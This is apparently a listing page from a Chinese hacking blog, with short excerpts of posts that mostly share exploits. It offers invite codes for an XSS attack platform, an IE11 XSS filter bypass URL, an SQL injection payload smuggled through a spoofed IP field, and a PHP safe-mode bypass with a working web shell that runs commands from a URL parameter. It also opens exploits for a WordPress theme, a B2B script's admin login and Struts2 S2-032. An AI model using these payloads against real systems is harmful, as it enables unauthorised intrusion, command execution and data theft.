• Xss测试平台邀请码[12月4日更新]

    Xss测试平台邀请码[12月4日更新]
    Links:http://xss.re/ 2015年11月30日 23:20 重新开启 邀请码: d0bee52a6dd0f7a770d109cffa31a49d a49fd8767a827b5d9c6075d0cc6e3e91 eb00f5a5c36d03055c7807c7c716fb24 5d85d80499b324c6596b501265a43ea6 e31b55764ce905cd3aa17734b1898509 16943fffcecd1759e3314df762aa215a accde626f685af525164571219d197dc c87c11639bd4170b9863392f4787682d ff169ce65b6006269b817a...
    作者:unhonker| 发布:2013年1月08日 | 分类:个人关注 | 被撸:73,035次| 标签:
  • IE11 XSS 过滤器绕过漏洞

    IE11 XSS 过滤器绕过漏洞
    EXP: http://unhonker.com/xss.php?x=%3Cmeta%20charset=cp1025%3E%27%20L%C9%86%D9%81%D4%85%40%C9%84~[%40%D6%95%D4%96%E4%A2%85%D6%A5%C5%99~m~%60JZ^NNm^mm~mNm^mmmm~mmNmm^mmmmmm~mmmmNmm^[JMOO}}N}}]JmZNMOO}}N}}]JmmZNMOO}}N}}]JmmmmZNMO}}N}}]JmZNM[N}}]JmmmmmmZZMm]n
    作者:unhonker| 发布:2016年6月14日 | 分类:漏洞公布 | 被撸:778次| 标签:
  • 青客云sql注入漏洞第二发

    青客云sql注入漏洞第二发
    本文出自红客联盟 太极实验室(ihonker.org) 这次不是延时注入,问题是出现在评论时获取ip处, 在发表评论的时候,发现,ip可以伪造,并且被带入到feedback数据库里面,一枚完美的注入产生了,在发表评论的时候,ip伪造下 8.8.8.8\",'IANA',user(),'','1463286558','0','','0')# 内容随便写,爆出了user() 其中1463286558表示的是时间 其中获取ip的函数 function g...
    作者:unhonker| 发布:2016年6月07日 | 分类:漏洞公布 | 被撸:744次| 标签:
  • WordPress Karma 4.7 – Responsive Theme Exploit

    WordPress Karma 4.7 – Responsive Theme Exploit
    <?php /**  * Exploit Title: Karma Theme Exploit  * Version: 4.7  * Tested on: Debian 8, PHP 5.6.17-3  * Type: Authenticated Options overwrite, Stored XSS  * Time line: Found [28-Apr-2016], Vendor notified [28-Apr-2016], Vendor fixed: [], [RD:1]  */     require_once('curl.php'); //OR //include('https://raw.githubusercontent.com/s...
    作者:unhonker| 发布:2016年6月07日 | 分类:漏洞公布 | 被撸:739次| 标签:
  • 绕过PHP5.2.X的安全模式

    绕过PHP5.2.X的安全模式
    php版本小于等于5.2.* <?php         //Exploit Code         system('\dir');         system('\net user');         print passthru ('\ipconfig');         exec('\whoami',$a);         print_r($a);         //Shell Script         //shell.php?cmd=net user         $cmd = '\\'.$_GET['cmd'];         system($cmd); ?>
    作者:unhonker| 发布:2016年5月13日 | 分类:漏洞公布 | 被撸:967次| 标签:
  • Alibaba Clone B2B Script管理身份绕过漏洞

    Alibaba Clone B2B Script管理身份绕过漏洞
    # Exploit Title: Alibaba Clone B2B Script Admin Authentication Bypass # Vendor Homepage: [url]http://alibaba-clone.com/[/url] # Version: All Versions     Exploit : For enter , simply enter the following code http://server/admin/adminhome.php?tmp=1     For each page is enough to add the following code to the end of url example see page...
    作者:unhonker| 发布:2016年5月05日 | 分类:漏洞公布 | 被撸:1,251次|
  • Struts2-032漏洞利用工具

    Struts2-032漏洞利用工具
    转载自shack2 新鲜出炉支持Struts2 s2-032漏洞的检查利用。如果有对Struts2 S2-029 这个鸡肋漏洞有兴趣的可以找我要下检查工具,这个鸡肋工具就不在这里共享了。 顺便分享下我改写的exp: S2-032 20160426 漏洞参考 http://seclab.dbappsecurity.com.cn/?p=924 获取磁盘目录: 1. method:[email protected]@DEFAULT_MEMBER_ACCESS,%23req%3d%40org...
    作者:unhonker| 发布:2016年4月26日 | 分类:漏洞公布 | 被撸:1,446次| 标签: